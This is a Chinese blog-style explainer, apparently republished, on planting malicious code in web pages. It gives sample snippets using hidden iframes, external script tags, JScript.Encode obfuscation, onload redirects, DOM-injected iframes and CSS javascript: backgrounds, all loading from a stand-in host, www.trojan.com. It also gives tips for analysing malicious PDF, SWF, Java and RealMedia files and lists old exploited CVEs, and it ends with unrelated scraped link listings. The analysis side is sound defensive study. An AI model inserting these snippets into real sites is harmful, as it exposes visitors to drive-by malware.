网站挂马

常见挂马方式

  1. 框架(iframe)挂马
<iframe src=http://www.trojan.com/ width=0 height=0></iframe>      //宽度和高度都为0
  1. js文件挂马
<script src=http://www.trojan.com/1.js></script>     //1.js文件中可能有恶意代码
  1. js变形加密
<script language="JScript.Encode">#@~^OAAAAA==[Km;s+ YRSDbO+vBw@!'/w^MkwD~/Mm'8 %/@*-@!-&-dw1DrwD@*B*iAxIAAA==^#~@</script>

该段代码使用了微软的MS Encode加密方式进行加密处理,解密后的结果是:

<script language="javascript">docume-t.write('\<\s\cript src=1.js>\<\/\s\cript>');</script>          //1.js
  1. body挂马
<body onload="window.location=' http://www.trojan.com/';"></body>        //onload自动跳转
  1. 隐藏挂马
<script>top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src=" http://www.trojan.com/"></iframe>';</script>         //通过DOM操作的方式创建框架访问
  1. css中挂马
body {
background-image: url('javascript:document.write("<script src= http://www.trojan.com/1.js></script>")')
}

当网页代码执行到body部分时,会根据CSS定义的背景图片地址进行访问

加密挂马

1.脚本

VBScript或Javascript代码加密,常用document.write方法,escape函数

处理:将document.write方法替换成函数alert,弹出网马内容;也可以通过DOM操作将明文代码写入到一个文本域中,这样可以解决网马明文代码过长而alert弹窗提示显示不完全的情况。

2.PDF文件

将恶意Javascript代码通过压缩处理的方式以数据流的形式存储在PDF文件中

处理:用kali自带工具PDF-parser.py分析

3.Flash文件 swf

由于Flash文件的特殊性,漏洞利用代码是通过ActionScript脚本代码的形式封装到SWF文件中的,所以直接通过网页脚本代码有时候是无法查看到网马利用代码的。

处理:将SWF文件下载回本地,然后对SWF文件中的ActionScript代码进行分析。分析工具使用Action Script Viewer,该工具可以直接查看swf文件中的ActionScript代码,方便我们对代码直接分析和查看。
ps,Action Script Viewer网上只有v3的demo了,需要付费,可以用别的flash反编译软件

网页中插入swf的语法一般格式为:

  <OBJECT classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000
codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5.0.0.0 WIDTH=760 NAME=quality VALUE=high> <EMBED src=”http://www.7747.net/xxx.swf” quality=high pluginspage=http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash type=application/x-shockwave-flash width=760 height=60></EMBED></OBJECT>

4.Java文件

利用JAVA漏洞通过Java Applet嵌入到网页代码中实现利用
正常jd-jui反编译就行了

5.影音文件

一般是RMRMVB为扩展名的文件。

在文本里面输入u 00:00:10.0 00:00:30.0&&_rpexternal&&http://www.xxx.com/horse.htm
(00:00:10.0就是发生第一事件的时间,这里是让计算机弹出网页
00:00:30.0同样,这是第二次发生的时间,在0时0分第30秒0微妙时弹出窗口;而后面的URL地址就是连接指定的木马地址。)

常利用的漏洞

IE:
MS06-014:Microsoft 数据访问组件 (MDAC)功能中的漏洞可能允许执行代码
MS06-055:矢量标记语言可能允许远程执行代码漏洞
MS07-017:ANI光标漏洞
MS09-032:MicrosoftDirectShow MPEG2TuneRequest组件栈溢出漏洞
MS10-018:Microsoft IE畸形对象操作内存破坏漏洞
MS11-002:Microsoft DataAccess组件漏洞
MS11-003:Microsoft InternetExplorer内存远程代码执行漏洞

PDF:
CVE-2008-2992:Adobe Readerutil.printf() JavaScript函数栈溢出漏洞
CVE-2009-0927:Adobe Acrobat和ReaderCollab getIcon() JavaScript方式栈溢出漏洞

SWF:
CVE-2010-3653:Adobe ShockwavePlayer Director文件rcsL块解析内存破坏漏洞
CVE-2011-0609:Adobe Flash PlayerCVE-2011-0609 'SWF’文件远程内存破坏漏洞

JAVA:
CVE-2010-1423:Java开发工具包URL参数远程代码执行漏洞
CVE-2010-4452:Oracle Java"Applet2ClassLoader"类未签名Applet远程代码执行漏洞
CVE-2010-4465:Oracle Java在处理剪贴板中的数据写入和读取的控制上存在远程代码执行漏洞
CVE-2012-4681:Oracle Java RuntimeEnvironment远程代码执行漏洞

参考文章:
https://blog.csdn.net/AG9GgG/article/details/83511957

常见网站挂马方式 网站挂马可利用漏洞 网站加密挂马相关推荐

  1. 爬取亚马逊评论_如何利用插件抓取亚马逊评论和关键词?

    如何抓取亚马逊的商品评价? 原本想给大家介绍使用市面上常见或者付费的爬虫工具,直到我发现了这个Chrome的免费插件 --Instant Data Scraper,当时我差点被感动哭了.比起学编程语言 ...

  2. 用python解决百马百担问题_利用C语言实现“百马百担”问题方法示例

    前言 百马百担问题,有100匹马,驮100担货,大马驮3担,中马驮2担,两匹小马驮1担,问共有多少种驮法?且各种驮法中大.中.小马各多少匹? [分析] 1.定义整型变量m.n.k分别存放大马匹数.中马 ...

  3. 织梦网站后台-织梦网站后台登陆方式-织梦CMS模板

    织梦网站后台登陆方式:域名/dede即可进入网站后台.织梦cms是一个独立的网站程序.今天给大家推荐的是织梦cms模板(内置5W套织梦cms模板)以及免费织梦cms插件其中包括有:织梦cms采集插件. ...

  4. 如何利用教育网站源码成功搭建在线教育网站

    如今是一个信息化时代,人们都想接受各种各样的教育,在线教育也就因此发展了起来,并且逐渐成为了一种趋势.而成熟的在线教育网站皆是由高质量的教育网站源码搭建而成的.如何利用教育网站源码成功搭建在线教育网站 ...

  5. 网站优化基础教程:发布外链常见的五种方式!

    想要做好网站优化,外链的发布也是很重要的一环,如果您还没有做,建议您抓紧去做一下. 这篇文章发迹创业网就分享一下,常见的几种发布外链的方法. 1,锚文本 又叫做超链接,是指给关键词加一个链接,点击该关 ...

  6. 网站被劫持的方式,和检测方法、网站被劫持怎么办

    网络劫持是通过浏览器劫持. 首先得明白什么是LSP. LSP全称为Layered Service Provider ,中文名为分层服务提供程序. LSP就是TCP/IP协议等的接口. 某些间谍软件会修 ...

  7. 利用知名站点欺骗挂马

    利用知名站点欺骗挂马 网络上有许多"钓鱼(Pushing)"式攻击,通过各种手段诱骗上网者浏览恶意的网站,导致各种网银或游戏帐号密码丢失.同样的,钓鱼式攻击也被用在欺骗性传播网页木 ...

  8. WAP网站的推广方式(自整合篇)

    WAP网站推广随着无线互联时代的到来,已经日益受到大家的重视.虽然WAP网站的目前盈利模式还不是很清晰,但WAP网站推广的竞争强度将肯定会越来越激烈,下面和大家一起探讨下WAP网站的推广方法. 方法/ ...

  9. 苹果cms最新漏洞总是被挂马跳转劫持 如何解决

    2020年刚开始,苹果CMS被爆出数据库代码执行漏洞,大量的电影网站被挂马,尤其电影的页面被篡改植入了恶意代码,数据库中的VOD表里的d_name被全部修改,导致网站打开后直接跳转到S站或者弹窗广告, ...

  10. 网站优化新方式亟需创新

    随着网站优化的门槛越来越高,想要在当下的互联网时代中做好网站优化就不能墨守成规.seo这个行业不再是以前简简单单的换链了,还需要有新的优化技术做辅助,改造https.建立熊掌号等等,这都是促进网站优化 ...

最新文章

  1. 编写 Solidity 测试脚本
  2. Ubuntu/CentOS下使用脚本自动安装 Docker
  3. Android CookieSyncManager同步cookie
  4. .net npoi xssfclientanchor设置图片缩放大小_.NET导出Excel的四种方法及评测
  5. 使用log4Net 输出日志到mongodb
  6. CF346E-Doodle Jump【类欧】
  7. 前端学习(3243):react的生命周期新
  8. Spring笔记③--spring的命名空间
  9. Python脚本做接口测试,抛弃接口测试工具是否可行?(一)
  10. K linux 部署手机 centos6.5
  11. 【linux】centos7下muduo库的安装
  12. c语言怎么编程判断关键字,C语言关键字
  13. 如何保存Win10壁纸
  14. JAVA导入不同包的同名类调用原则小结
  15. 【投资】如何绘制期权收益图
  16. 业财一体化系统建设思路
  17. IOS唤起键盘后--导致页面底部空白问题
  18. cf: Ehab and Path-etic MEXs
  19. GM7150BC是一颗将CVBS/S-Video视频源转换成BT656/601
  20. IEEE1394串行连接技术

热门文章

  1. java爬虫音乐搜索_爬虫爬取抖音热门音乐 - MS_Andrew的个人空间 - OSCHINA - 中文开源技术交流社区...
  2. php codeigniter,PHP项目中CodeIgniter使用的一些建议
  3. 扑克牌游戏----花色从大到小按黑桃(Spade)、红桃(Heart)、梅花(Club)、方块(Diamond)排列
  4. MAC系统下破解WIFI密码
  5. 计算机qq群怎样提交作业,qq群作业怎么弄 qq群作业功能详细介绍
  6. 年仅 28 岁就宣布从字节跳动退休?
  7. MacBook安装pdf阅读器
  8. 【Linux】rm -rf 删除命令
  9. 【AI视野·今日CV 计算机视觉论文速览 第226期】Thu, 24 Jun 2021
  10. Kali linux安装拼音、双拼、五笔拼音输入法:fcitx-table-wbpy中文输入法步骤详解